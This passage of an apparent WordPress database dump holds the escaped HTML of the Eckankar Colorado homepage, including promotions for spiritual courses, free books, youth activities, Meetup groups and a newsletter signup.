src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236969,40275,'post_new_post_content','<?xml version=\"1.0\" standalone=\"no\"?>\r\n<svg xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"wave\" style=\"transform:rotate(0deg); transition: 0.3s; margin-top: -80px;\" viewBox=\"0 0 1440 100\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\"><defs><linearGradient id=\"sw-gradient-0\" x1=\"0\" x2=\"0\" y1=\"1\" y2=\"0\"><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"0%\"/><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"100%\"/></linearGradient></defs><path style=\"transform:translate(0, 0px); opacity:1\" fill=\"url(#sw-gradient-0)\" d=\"M0,10L60,18.3C120,27,240,43,360,41.7C480,40,600,20,720,10C840,0,960,0,1080,5C1200,10,1320,20,1440,23.3C1560,27,1680,23,1800,20C1920,17,2040,13,2160,15C2280,17,2400,23,2520,23.3C2640,23,2760,17,2880,11.7C3000,7,3120,3,3240,6.7C3360,10,3480,20,3600,28.3C3720,37,3840,43,3960,50C4080,57,4200,63,4320,56.7C4440,50,4560,30,4680,26.7C4800,23,4920,37,5040,41.7C5160,47,5280,43,5400,48.3C5520,53,5640,67,5760,75C5880,83,6000,87,6120,80C6240,73,6360,57,6480,41.7C6600,27,6720,13,6840,15C6960,17,7080,33,7200,33.3C7320,33,7440,17,7560,10C7680,3,7800,7,7920,10C8040,13,8160,17,8280,21.7C8400,27,8520,33,8580,36.7L8640,40L8640,100L8580,100C8520,100,8400,100,8280,100C8160,100,8040,100,7920,100C7800,100,7680,100,7560,100C7440,100,7320,100,7200,100C7080,100,6960,100,6840,100C6720,100,6600,100,6480,100C6360,100,6240,100,6120,100C6000,100,5880,100,5760,100C5640,100,5520,100,5400,100C5280,100,5160,100,5040,100C4920,100,4800,100,4680,100C4560,100,4440,100,4320,100C4200,100,4080,100,3960,100C3840,100,3720,100,3600,100C3480,100,3360,100,3240,100C3120,100,3000,100,2880,100C2760,100,2640,100,2520,100C2400,100,2280,100,2160,100C2040,100,1920,100,1800,100C1680,100,1560,100,1440,100C1320,100,1200,100,1080,100C960,100,840,100,720,100C600,100,480,100,360,100C240,100,120,100,60,100L0,100Z\"/></svg>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 